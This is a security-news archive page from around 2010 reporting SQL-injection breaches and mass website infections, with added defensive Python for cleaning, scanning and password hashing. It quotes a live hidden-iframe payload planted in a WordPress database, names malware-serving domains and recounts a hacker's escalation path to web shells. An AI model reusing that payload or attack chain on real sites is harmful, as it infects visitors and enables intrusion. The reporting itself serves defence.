CyberInsecure.com

Daily cyber threats and internet security news: network security, online safety and latest security alerts

Archive for the ‘SQL Injections’ Category

New Mass Injection Attack Adds Rogue Code To JS Files, Rackspace And Media Temple Affected

Monday, August 9th, 2010

Security researchers warn that a new mass injection attack is affecting websites hosted at Rackspace and Media Temple. The compromises result in rogue JavaScript code being added to legitimate .js files used by the affected websites.

The new attack was reported by Denis Sinegubko, the creator of the Unmask Parasites website scanner. “Right before this week-end I noticed an increased number of sites hosted on MediaTemple and RackSpace coming to Unmask Parasites with the same problem — their sites are blocked by Google and their diagnostic pages mention the following five domains: ‘myads .name’, ‘adsnet .biz’, ‘toolbarcom .org’, ‘mybar .us’, ‘freead .name’,” the Web security expert notes.

What’s rather unusual about this attack is that the malicious code is not necessarily inserted into the .html files or .php scripts. In fact, this is hardly the case. Instead, the attackers add the rogue code to static .js files that already exist on the server.

Another noteworthy aspect of these injections is that the malicious JavaScript snippet is not added on a new line in the tainted files. It is prepended to the first line of the file, which makes automatic removal harder, since deleting the entire line would also break the legitimate code. According to Sinegubko, automatic cleaning scripts should not remove anything after “this.O=58441;var gr0=0;”.

The rogue JavaScript first checks whether the visitor is a search engine crawler or a real user; the malicious payload is not served to search engine bots. Real visitors are also targeted only once, after which a cookie is set in their browser so they are not attacked again. There is obviously no point in trying to re-infect a user who has already been infected, or on whose computer the exploit failed.

The attackers serve the payload from multiple websites, most likely for redundancy and to make filtering harder. The rogue code will calculate a URL and load the malicious content from it. Sinegubko explains that there are 5 domains and 36 subdomain variations on each. That means 180 possible malicious URLs.

Websites hosted at both companies have been targeted in mass injection attacks before. However, their security staff have not found any particular vulnerability being exploited or any security hole in their own infrastructure. The Unmask Parasites creator suggests that this might be related to overly generous file permissions. He suggests changing the permissions of static content files like .js, which hardly ever get modified, to 444 or even 400, if the Web application does not need to change them either.
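A cleaner that follows the two points above (strip only the prefix up to the quoted marker on the first line, then make the .js files read-only and report which ones were group- or world-writable), as an added example that is neither the article's nor Unmask Parasites' code; the file contents and directory are constructed, and the rogue prefix is a stand-in for the obfuscated snippet.

```python
import os
import stat
import tempfile

# Marker quoted in the article: the rogue snippet is prepended to the first
# line of an existing .js file and ends with this string.
INJECTION_MARKER = "this.O=58441;var gr0=0;"


def clean_prepended_js(content):
    """Return (cleaned_content, was_infected).

    Only the text up to and including the marker on the FIRST line is
    removed. Whatever follows the marker on that line is the site's own
    code, so deleting the whole line (as a naive cleaner would) breaks it.
    """
    first_line, sep, rest = content.partition("\n")
    idx = first_line.find(INJECTION_MARKER)
    if idx == -1:
        return content, False
    cleaned_first = first_line[idx + len(INJECTION_MARKER):]
    return cleaned_first + sep + rest, True


def is_group_or_world_writable(path):
    """True if group or others may write the file (e.g. mode 666 or 777)."""
    mode = stat.S_IMODE(os.stat(path).st_mode)
    return bool(mode & (stat.S_IWGRP | stat.S_IWOTH))


def scan_and_clean(root, harden=True):
    """Walk `root`, clean tainted .js files and (optionally) chmod them to 444.

    Returns {path: {"infected": bool, "was_writable": bool}}.
    """
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.endswith(".js"):
                continue
            path = os.path.join(dirpath, name)
            with open(path, encoding="utf-8", errors="replace") as fh:
                content = fh.read()
            cleaned, infected = clean_prepended_js(content)
            was_writable = is_group_or_world_writable(path)
            if infected:
                with open(path, "w", encoding="utf-8") as fh:
                    fh.write(cleaned)
            if harden:
                os.chmod(path, 0o444)  # read-only, as the article suggests
            report[path] = {"infected": infected, "was_writable": was_writable}
    return report


def demo():
    """Constructed sample: one tainted and one clean file in a temp directory."""
    legit = "var site = {};\nsite.init = function () {};\n"
    # Stand-in for the obfuscated snippet; only its trailing marker matters here.
    rogue = "/* constructed rogue prefix */" + INJECTION_MARKER
    tmp = tempfile.mkdtemp()
    bad, good = os.path.join(tmp, "app.js"), os.path.join(tmp, "lib.js")
    with open(bad, "w") as fh:
        fh.write(rogue + legit)
    with open(good, "w") as fh:
        fh.write(legit)
    os.chmod(bad, 0o666)  # the over-generous permission the article warns about
    os.chmod(good, 0o644)
    report = scan_and_clean(tmp)
    with open(bad) as fh:
        restored = fh.read() == legit
    return report[bad], report[good], restored, is_group_or_world_writable(bad)


if __name__ == "__main__":
    print(demo())
```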

Credit: Softpedia.com News


The Pirate Bay Compromised, Hacker Swipes Details Of 4 Million Users

Thursday, July 8th, 2010

The Pirate Bay has been compromised by an Argentinean hacker who made off with usernames, email and internet addresses of more than four million people signed up to the BitTorrent tracker site.

KrebsOnSecurity.com reported yesterday that Ch Russo broke into TPB’s system and grabbed the info from the notorious website, which might amuse some pro-copyright groups.

Russo had considered selling the private data, but in the end decided to go public about TPB’s shaky security credentials. He accessed the information in the site’s user database by exploiting an SQL injection vulnerability.

“We wanted to tell people that their information may not be so well protected,” Russo said.

Meanwhile, it may be a coincidence, but The Pirate Bay is currently out of action and carried the following message:

“Upgrading some stuff, database is in use for backups, soon back again.. Btw, it’s nice weather outside I think.”

At this moment the website appears to be offline.

Credit: The Register


Critical Security Holes In OpenCart, Multiple osCommerce Websites Infected With Malicious Code

Tuesday, July 6th, 2010

A security researcher claims he’s found a total of fourteen dangerous vulnerabilities in OpenCart. However, because the project’s lead developer is apparently unwilling to address security issues, he recommends that people migrate away from OpenCart as soon as possible. Security researchers also warn that multiple osCommerce websites have been compromised during the last few days. The rogue code injected into their pages attempts to infect visitors with malware served from an external domain.

OpenCart has grown to be one of the most popular open source online shopping cart systems, along with osCommerce, Zen Cart and Magento. The software is used by thousands of online stores that handle sensitive customer information on a daily basis.

Considering that people expect to be in a secure environment when they shop online, one would think that security is one of the primary development goals for such a project. However, a Mexican security researcher named Eduardo Vela, who goes by the online moniker of sirdarckcat, claims this couldn’t be further from the truth when it comes to OpenCart.

In his blog Mr. Vela explains that some time ago he tried to report several serious vulnerabilities to the OpenCart project on behalf of a fellow researcher who discovered them. Amongst these, there was a Local File Inclusion (LFI) flaw, an issue allowing remote arbitrary code execution and a critical cross-site request forgery (CSRF) bug, which could be exploited to take complete control of the Web application.

According to the researcher, who adheres to responsible disclosure practices, Daniel Kerr, the OpenCart lead developer, asked not to be bothered. Since then, further security audits of OpenCart performed by Mr. Vela and his associates have revealed a total of fourteen dangerous vulnerabilities that, given Daniel Kerr’s attitude towards security, will probably never get fixed. Therefore, the only advice left to give to webmasters is to stop using the product entirely.

The compromises of osCommerce websites have been detected by Sucuri Security, a company selling Website integrity monitoring solutions. An investigation into the incidents is ongoing, but it has been determined that all have been injected with a rogue script element loading code from an http://nt02. co.in/ 3 address [intentionally malformed].

So far most of the affected websites also had clandestine files uploaded to their /images folder. These files are called inclasses.php, loadclasses.php or phpclasses.php. “If you are an osCommerce user, please make sure to update your installation (and check your sites) as soon as possible,” Sucuri researcher David Dede advises.

The company is still trying to determine how the attackers succeeded in compromising the websites, but an osCommerce Remote File Injection (RFI) vulnerability disclosed about a month ago might be responsible. The bug is in “file_manager.php” and, according to a SecurityFocus advisory, is the result of a failure to properly sanitize user input.

osCommerce is notorious for extremely long wait times between releases. The latest stable version is 2.2 RC2a, which was released more than two and a half years ago, on January 30, 2008. However, there are a few measures webmasters can take to protect their websites.

Credit: Softpedia.com News


Thousands Of High-Ranked Webpages Infected With Malware, Including Intljobs.org, WSJ.com, tomtom.com.tw

Wednesday, June 9th, 2010

More than 100,000 webpages, some belonging to newspapers, police departments, and other large organizations, have been hit by an attack over the past few days that redirected visitors to a website that attempted to install malware on their machines.

The mass compromise appears to have affected sites running a banner-ads module on top of Microsoft’s Internet Information Services using ASP.NET, said David Dede, head of malware research at Sucuri, a website monitoring firm. Intljobs.org, The Wall Street Journal’s wsj.com, The Jerusalem Post, tomtom.com.tw and the police department website for the UK county of Strathclyde have been hacked.

Google searches on Tuesday indicated more than 100,000 pages were infected, Dede said, but that number had shrunk to about 7,750 at time of writing.

The sites were infected using SQL injection exploits, which allow attackers to tamper with a server’s database by typing commands into search boxes and other user-input fields. The hackers used the exploit to plant iframes in the compromised sites that redirected visitors to robint.us. Malicious JavaScript on that site attempted to infect end users with malware dubbed Mal/Behav-290, according to anti-virus firm Sophos.

Robint.us has been disabled, thanks to a sinkholing effort carried out by the volunteer security outfit Shadowserver Foundation. The action will allow Shadowserver researchers to get a complete list of compromised sites and to gather additional information about how the attack was carried out, spokesman André M. Di Mino said in an email. He said the details would be published soon.

The SQL injection attacks came from Chinese IP address 121.14.154.69, Dede said. Robint.us was registered to a Dongguan Wanjian of Dongguan, China, according to whois records. Dede said he is still trying to determine the module that is being compromised in the mass hack attack.

Credit: The Register


Unknown Attack Compromised Hundreds Of WordPress Websites

Saturday, April 10th, 2010

Hundreds of WordPress-powered blog owners have recently found their websites inaccessible after a critical value was altered in the database. The attack seems to affect even the latest version of the popular blog platform and, so far, the entry point has not been determined.

Sucuri Security Labs, a provider of Web-based integrity monitoring, reports that a worrying number of blogs were compromised during the last week, in an attempt to silently redirect visitors to a malicious URL loading exploits. According to the company, most of the affected sites are hosted at Network Solutions.

The common symptom of the hack is an altered “siteurl” value in the “wp_options” database table. This variable should normally contain the main URL of the website; however, on affected installations it is modified to a rogue <iframe> element pointing to http://networkads.net/grep/ [don't open].

This is how it looks in the database:

(2, 0, 'siteurl', '<iframe style=\"display:none\" height=\"0\" width=\"1\" src=\"http://networkads.net/grep/\"></iframe>', 'yes'),

Since “siteurl” is not supposed to hold HTML code, this modification breaks the entire blog layout and prevents users and admins alike from reaching the website. The unusual technique suggests that the attackers are amateurs and not particularly familiar with the intricacies of the WordPress platform.

Another interesting aspect is that no one has successfully pinpointed the entry point used by the attackers, which could be either an unidentified security hole in WordPress or in a common plug-in. “The only way for the database to be modified like that is via SQL injection or a bigger problem inside Network Solutions databases,” David Dede, a security researcher with Sucuri, said; however, no suspicious activity was registered in the access logs.

Shashi Bellamkonda, head of social media strategy at Network Solutions, challenged the idea that only blogs hosted with Network Solutions were affected. “It’s not accurate to say that this affects only Network Solutions customers. It seems like there have been a spate of these attacks over the past few weeks,” he wrote in response to Sucuri’s report.

Fixing the rogue “siteurl” entry in the database might not be enough to mitigate this problem, as a lot of webmasters reported their blogs getting reinfected. It is also recommended to manually override the “siteurl” value via wp-config.php.

To fix this issue, just revert your siteurl to its previous value. Log in to your control panel, go to manage database, and edit the siteurl value in the wp_options table.

Update: It seems that a malicious user employed a script that automatically scoured the Network Solutions system for poorly secured accounts and, when found, modified the databases so the corresponding websites redirected users to the malicious website. The mass hack caused Network Solutions customers running WordPress to silently redirect visitors to malicious sites. Network Solutions has now closed the hole by resetting database passwords for the blogging software, the company said Sunday. Users should also review their settings for any administrative access accounts that aren’t recognized and if found delete them.
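A database-side check for the symptom described in this article and in the mass-injection story above (iframe or script markup planted in database values, here the tampered “siteurl” row), as an added example that is not code from Sucuri, WordPress or the article; sqlite3 stands in for the site's MySQL database, the tables and rows are constructed to mirror the quoted wp_options row, and http://example.com is a placeholder for the real site URL.

```python
import re
import sqlite3

# Markup that has no business inside a URL or a configuration value.
INJECTED_MARKUP = re.compile(r"<\s*(iframe|script)\b", re.IGNORECASE)
SANE_URL = re.compile(r"https?://[A-Za-z0-9.\-]+(:\d+)?(/[^\s<>\"']*)?")


def find_injected_markup(conn):
    """Scan every text value in every table for <iframe>/<script> markup.

    Returns a list of (table, column, rowid, value). sqlite3 is used here as a
    stand-in for the MySQL database behind a WordPress or ASP.NET site; the
    same loop applies there using information_schema.
    """
    hits = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type = 'table'")]
    for table in tables:
        cols = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')]
        for col in cols:
            query = (f'SELECT rowid, "{col}" FROM "{table}" '
                     f'WHERE typeof("{col}") = \'text\'')
            for rowid, value in conn.execute(query):
                if INJECTED_MARKUP.search(value):
                    hits.append((table, col, rowid, value))
    return hits


def check_siteurl(conn):
    """WordPress-specific: return (stored siteurl, looks_like_a_plain_url)."""
    row = conn.execute(
        "SELECT option_value FROM wp_options WHERE option_name = 'siteurl'"
    ).fetchone()
    if row is None:
        return None, False
    return row[0], SANE_URL.fullmatch(row[0]) is not None


def restore_siteurl(conn, expected_url):
    """Put the legitimate URL back, the fix the article describes.

    Because reinfection was reported, also pin the value in wp-config.php
    with define('WP_SITEURL', ...) so the database row is no longer trusted.
    """
    conn.execute("UPDATE wp_options SET option_value = ? WHERE option_name = 'siteurl'",
                 (expected_url,))
    conn.commit()


def demo():
    """Constructed sample mirroring the altered wp_options row in the article."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE wp_options (option_id INTEGER PRIMARY KEY, blog_id INTEGER, "
                 "option_name TEXT, option_value TEXT, autoload TEXT)")
    conn.execute("CREATE TABLE wp_posts (ID INTEGER PRIMARY KEY, post_content TEXT)")
    rogue = ('<iframe style="display:none" height="0" width="1" '
             'src="http://networkads.net/grep/"></iframe>')
    conn.executemany("INSERT INTO wp_options VALUES (?, ?, ?, ?, ?)", [
        (1, 0, "blogname", "Example blog", "yes"),
        (2, 0, "siteurl", rogue, "yes"),  # the tampered value
    ])
    conn.execute("INSERT INTO wp_posts VALUES (1, '<p>Hello world</p>')")
    hits = find_injected_markup(conn)
    before = check_siteurl(conn)
    restore_siteurl(conn, "http://example.com")  # placeholder for the real site URL
    after = check_siteurl(conn)
    return hits, before, after


if __name__ == "__main__":
    for hit in demo()[0]:
        print("injected markup in %s.%s rowid %s" % hit[:3])
```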

Credit: Softpedia.com News


Whirlpool’s Kitchenaid.com Remains Malware Infected For 5 Months

Monday, January 25th, 2010

Domestic appliance manufacturer Whirlpool has come under fire for failing to clean up a malware infection on one of its sites, months after it was notified of a problem by UK anti-virus firm Sophos.

Sophos tried for months to get Whirlpool to clean up its Kitchenaid.com website, without success, before going public on the problem on Friday. The kitchen utensil selling site remains infected with the Badsrc-C (AKA Asprox) strain of malware five months after a Sophos customer reported a problem, which the security firm forwarded to the white goods firm.

The malicious script points towards nowhere at present, so there isn’t an immediate risk. The problem is that this may change at any time, hence the need for remedial action that Whirlpool seems reluctant to take.

“I and several of my colleagues have been trying to talk to contacts at KitchenAid and Whirlpool to inform them of the issue and offer assistance. We have consistently hit brick walls,” reports senior Sophos threat analyst Paul Baccas.

Whirlpool’s lack of action is symptomatic of a wider problem. Reports of malware problems on websites are hard even for security firms to send to the right person, are often disregarded and sometimes met with indignation, Baccas writes.

The Asprox strain of malware still lingering on Kitchenaid.com’s website has been linked to phishing spam. SQL injection attacks on vulnerable websites have been a preferred method for spreading malware.

Credit: The Register


US Army Website Compromised Through SQL Injection

Saturday, January 9th, 2010

A Romanian grey hat hacker has disclosed an SQL injection (SQLi) vulnerability on a website belonging to the United States Army, which leads to full database compromise. The website, called Army Housing OneStop, is used to provide information about military housing facilities to soldiers. The website has been taken offline.

The Army Housing OneStop (AHOS) is “the official Army website for soldiers who need information about Military Family Housing (MFH), Unaccompanied Personnel Housing (UPH) and/or Community (Off-Post) Housing. It includes both comprehensive and quick-reference information for Army installations worldwide.”

A self-confessed security enthusiast, who goes by the online handle of TinKode, documented a proof-of-concept attack against onestop.army.mil on his personal blog. The published screenshots reveal that the Web server runs on Microsoft Windows 2003 with Service Pack 2 and the database engine used to power the ASP website is Microsoft SQL Server 2000:

#Version: Microsoft SQL Server 2000 - 8.00.2282 (Intel X86) Dec 30 2008 02:22:41 Copyright (c) 1988-2003 Microsoft Corporation Enterprise Edition on Windows NT 5.2 (Build 3790: Service Pack 2
#User: Dynatouch
#Database: AHOS
#Host Name: AHSGSVDAHQIT130

The AHOS website seems to have been developed by DynaTouch Corporation, a third-party government contractor that provides software and hardware solutions to create “self-service kiosk systems.” The company’s client portfolio includes a long list of local and federal government organizations.

There are 76 databases on the server, but TinKode focused his attention on the one called “AHOS.” There are various tables in this database containing general website configuration information, but two in particular stand out, as they are called “mgr_login” and “mgr_login_passwords.”

Upon investigating the latter, the hacker stumbled upon passwords stored in plain text, a major security oversight. Storing cryptographic hashes instead of the actual password strings has been a common practice in Web application programming for years now. Furthermore, if for convenience the hashes are generated with a weak algorithm, a technique known as “salting” can be employed to make them nearly impossible to crack.

In a time when even the most amateur programmers follow such security practices, the fact that many business or government websites do not boggles one’s mind. Additionally, the administrative account is called “Dynatouch” – who would have guessed that? – and its password is “AHOS” – yes, really.
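A migration of a plaintext credential table like the one the article names to per-user salted PBKDF2 hashes, with a parameterised login check, as an added example that is neither the site's code nor the article's; the table and rows are constructed, and “AHOS” is used only because the article reports it as the stored password.

```python
import hashlib
import hmac
import os
import sqlite3

ITERATIONS = 600_000  # PBKDF2-HMAC-SHA256 work factor; raise as hardware allows


def hash_password(password, salt=None):
    """Return 'pbkdf2_sha256$<iterations>$<salt hex>$<hash hex>' for storage."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt per user
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, ITERATIONS)
    return f"pbkdf2_sha256${ITERATIONS}${salt.hex()}${digest.hex()}"


def verify_password(password, stored):
    """Recompute the hash with the stored salt and compare in constant time."""
    algo, iters, salt_hex, hash_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"),
                                 bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(digest.hex(), hash_hex)


def migrate_plaintext_table(conn):
    """Replace every plaintext password in mgr_login_passwords with a salted hash.

    Returns the number of rows examined. Rows already in the new format are
    left alone, so the migration can be re-run safely.
    """
    rows = conn.execute("SELECT rowid, password FROM mgr_login_passwords").fetchall()
    for rowid, pw in rows:
        if pw.startswith("pbkdf2_sha256$"):
            continue
        conn.execute("UPDATE mgr_login_passwords SET password = ? WHERE rowid = ?",
                     (hash_password(pw), rowid))
    conn.commit()
    return len(rows)


def login(conn, username, password):
    """Parameterised lookup plus hash verification; never compares plaintext."""
    row = conn.execute("SELECT password FROM mgr_login_passwords WHERE username = ?",
                       (username,)).fetchone()
    return row is not None and verify_password(password, row[0])


def demo():
    """Constructed table with the plaintext layout the article describes."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE mgr_login_passwords (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO mgr_login_passwords VALUES (?, ?)",
                     [("Dynatouch", "AHOS"), ("editor", "correct horse")])
    examined = migrate_plaintext_table(conn)
    stored = conn.execute("SELECT password FROM mgr_login_passwords "
                          "WHERE username = 'Dynatouch'").fetchone()[0]
    return (examined, stored.startswith("pbkdf2_sha256$"),
            login(conn, "Dynatouch", "AHOS"), login(conn, "Dynatouch", "wrong"),
            login(conn, "nobody", "AHOS"))


if __name__ == "__main__":
    print(demo())
```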

Credit: Softpedia News


Fox Sports Web Site Infected, Injected Code Serves Exploits

Thursday, December 31st, 2009

Security researchers warn that the Fox Sports website has been compromised by unknown attackers, who injected malicious code into a custom error page. There are two separate malicious script tags, each of them created by a different infection.

The page was detected by the ThreatSeeker Network system developed and operated by Websense, a Web security vendor. Security researchers investigating the suspicious link determined that it was pointing to a custom “Page not Found” document, displayed in case of a 404 error.

Webmasters deploy such pages in order to help visitors who are looking for a Web resource that is no longer available. They include suggestions or search boxes that can be used to find the new location of the document.

The msn.foxsports.com website is operated by the Fox Sports division of the Fox Broadcasting Company and according to Alexa, it is in the top 330 websites in the world as far as traffic goes. This website is ranked at position 88 in the United States and is part of the MSN network.

The first malicious script tag loads a script from an external domain that has been used in cybercriminal operations before. In particular, this script is part of the latest version of a mass injection attack known as Gumblar. Highly obfuscated code is used to perform various checks to determine a visitor’s browser, operating system or installed software, and then execute exploits for known vulnerabilities.

“After deobfuscation, the page uses PDF and Flash exploits to run malware in order to control a victim’s computer. In addition, a piece of VBScript is executed to download malware,” the Websense researchers explain.

The secondary script tag loads a potentially malicious JavaScript file from a .cn domain. However, the server hosting this threat was offline and the security analysts couldn’t determine its nature. The Fox Sports page seems to be clean now, but there is no way of telling for how long this infection ran until it was discovered.

It is worth noting that a similar issue was found on the MSN Canada website back in June. In that case, a redirect page, invisible to the user, but parsed by the browser, was infected with malicious code.

Credit: Softpedia.com


Intel Website Hacked, Personal Data Exposed Through SQL Injection

Wednesday, December 23rd, 2009

A Romanian hacker who goes by the handle “unu” has struck again: this time, he demonstrated how a SQL injection vulnerability left personal information in the form of passports exposed on an Intel Corp. Website.

Unu, who previously exposed SQL injection vulnerabilities in The Wall Street Journal and Kaspersky Lab’s Websites, this time focused on an Intel site that runs online registrations for channel partner events. The site, which is currently down, has a message posted that it’s offline for maintenance.

An Intel spokesperson says the company has taken down the site and is “investigating the matter.”

In his blog post on the Intel site’s vulnerability, unu says: “Not only is the website vulnerable to sql injection but it also allows load_file to be executed making it very dangerous because with a little patience, a writable directory can be found and injection a malicious code we get command line access with which we can do virtually anything we want with the website: upload phpshells, redirects, INFECT PAGES WITH TROJAN DROPPERS, even deface the whole website.”

He was able to hack into the front-end Web application and then discovered that server administrators had their passwords stored in clear text, according to the post.

Security experts at Praetorian Security Group who analyzed Unu’s hack say most alarming about the hack is a screenshot that appears to show people who registered for an event, along with their passport numbers, birth dates, and credit card types. “Unu acknowledges that he simply is not showing the credit card numbers, expiration dates, and CW/CID codes but they are also in the table,” they blogged.

Daniel Kennedy, a partner with Praetorian, says the site had been defaced before by someone else. “So Intel or the supporting vendor has to take a long look at who besides Unu could have been in that database,” Kennedy says.

“Intel realistically has to notify everyone who could be affected … this is passport and credit card data,” he says.

Credit: DarkReading.com, unu123456.baywords.com


RockYou.com SQL Injection Flaw Exposes 32 Million Accounts Passwords

Wednesday, December 16th, 2009

Millions of user passwords to social networking sites have been exposed, after a serious SQL injection flaw on the Rockyou.com website left login details - stored in plain text - up for grabs.

RockYou - which develops apps for social networking sites including Facebook, Bebo and MySpace - stored usernames, passwords and email addresses in plain text. That’s bad enough in itself, but then an SQL injection flaw on RockYou’s website exposed the information to prying eyes.

Amichai Shulman, chief technology officer with the data security firm Imperva, said the passwords exposed will often be the same as those users utilize for webmail accounts associated with their social networking profiles, creating yet more potential problems.

The first issue is that RockYou attempted to downplay the entire incident, first by covering it up by not notifying users and then downplaying it in an official statement as being an issue that only affected ‘older’ applications. The hacker responsible for the initial breach published a small portion of the dataset he had retrieved and was able to show that not only did he have access to their entire database, but also passwords were stored in the clear. This matter now appears worse than originally suspected as the dataset also contains a table where RockYou have stored user credentials for social networks and other partner sites.

The database consists of a table containing partner data, and another table that has stored the credentials for those partner sites that users have entered. This includes social networks such as MySpace but also webmail accounts.

The initial exploit took advantage of a trivial SQL injection vulnerability, a technique that has been well documented for over a decade. The method is extremely basic in execution, yet catastrophic in impact – which RockYou, and the site’s users, are now learning the hard way. It is more of a surprise that this had not happened sooner – as the RockYou platform is a Swiss cheese of security vulnerabilities and poor practices.

“The bad news is that the SQL injection flaw could have allowed hackers to access the 32 million entries of user names plus passwords in the Rockyou.com database… since the user names and passwords are by default the same as the user’s webmail account — such as Hotmail, Yahoo or Gmail — this is a major lapse in security,” Shulman said.

“Unfortunately some accounts had already been compromised before the vulnerability was fixed,” Shulman said. “All users need to be cautious and ensure they change their email passwords as their credentials may have been put at risk.”

It’s unclear why RockYou left passwords on its systems without encrypting them in the first place. We dropped a note to the developers asking for a response on this point on Tuesday, but are yet to hear back. We’ll update this story as and when we know more.

RockYou has reportedly fixed the issue, but this may have come too late for some.

Credit: The Register, TechCrunch.com
